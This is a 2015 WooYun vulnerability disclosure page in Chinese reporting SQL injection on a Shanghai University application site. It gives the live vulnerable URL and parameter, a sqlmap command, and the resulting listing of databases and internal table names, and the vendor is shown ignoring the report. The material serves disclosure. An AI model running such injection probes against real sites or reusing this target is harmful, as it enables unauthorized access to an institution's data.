当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109181

漏洞标题:上海大学外国网MSSQL注入一处

相关厂商:上海大学

漏洞作者: 路人甲

提交时间:2015-04-24 15:24

修复时间:2015-04-29 15:26

公开时间:2015-04-29 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入,,虽然是MSSQL 2005,,但是还有点卡,,涉及的表比较多,,,

详细说明:

C:\Users\Administrator>sqlmap.py  -u  http://www.apply.shu.edu.cn/sys/web/Notice
s_Highlights_Detail.asp?id=69 --dbs
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [13]:
[*] Asset
[*] DtCmsdb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] shwg
[*] sthotel
[*] tempdb
[*] w0619
[*] wit_portal
[*] wit_portal1203
Database: wit_portal
[115 tables]
+-------------------------+
| BM |
| CSDA |
| C_finance_manage |
| Collegepapers |
| ConfuciusInstitute |
| ConfuciusInstituteZDYLX |
| DLRZ |
| DXCZD |
| DXZH |
| DYSZ |
| Directory |
| KJTB |
| MODU |
| MODU_doc |
| MySet |
| OA_CYDX |
| OA_GZZD |
| OA_JSB |
| OA_KeyInfo |
| OA_MAIL |
| OA_MESS_FS |
| OA_MESS_JS |
| OA_ProjectInfo |
| OA_QXDJ |
| OA_QYGG |
| OA_SubjectInfo |
| OA_VoteData |
| OA_VoteDetail |
| OA_WDRC |
| OA_WDYJ |
| OA_XQD |
| OA_XQD_FP |
| OA_XQD_SP |
| OA_XQFL |
| OA_YJX |
| OA_dbgl |
| OA_dbgl_SP |
| OA_jfgl |
| OA_jfgl_FP |
| OA_jfgl_SP |
| OA_jfgl_fl |
| OA_jfgl_xx |
| OA_jfglbx |
| OA_jfglbx_SP |
| OA_jfglys |
| OAhd_QYGG |
| OArs_QYGG |
| PR_RWD01 |
| PR_RWD02 |
| QY |
| Quick |
| ROLE |
| ROLE_QX |
| Sheet1$ |
| StudentMODU |
| StudentZDYLX |
| Studentbmwebas |
| Studentbmwebxl |
| Studentbmwebxlcc |
| Studentjh |
| Studentlog |
| Studentmail |
| Studentprint |
| Studentzy |
| SystemLog |
| TReceive |
| TSmsSendLog |
| Url |
| YH |
| YH2014 |
| YH_WORK |
| ZDYLX |
| ZDYLXcwej |
| ZW |
| bmail |
| c_jfgl |
| client |
| dt_Article |
| dt_Article2014 |
| dt_Article201419 |
| dt_Article4 |
| dt_Feedback |
| dt_userlist |
| dtproperties |
| fs |
| hetong |
| hk_DeptKey |
| hk_DeskTop |
| hk_MyDesk |
| hqpjry |
| hqpjyue |
| ht_rm_sorder |
| ht_rm_sorder2 |
| khblsd |
| linkmans |
| oa_gzzj |
| oadwhdgl_QYGG |
| oagqfhdgl_QYGG |
| oaxjhdgl_QYGG |
| pj_temp |
| pj_temp2013 |
| pjjg |
| pjjg2012 |
| pjjg2013 |
| pjtm |
| records |
| recordsPlan |
| shmail |
| st_bill |
| st_bs |
| st_bs02 |
| st_bs2013 |
| webdh |
| webwz |
| webzy |
+-------------------------+

漏洞证明:

rt

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-29 15:26

厂商回复:

最新状态:

暂无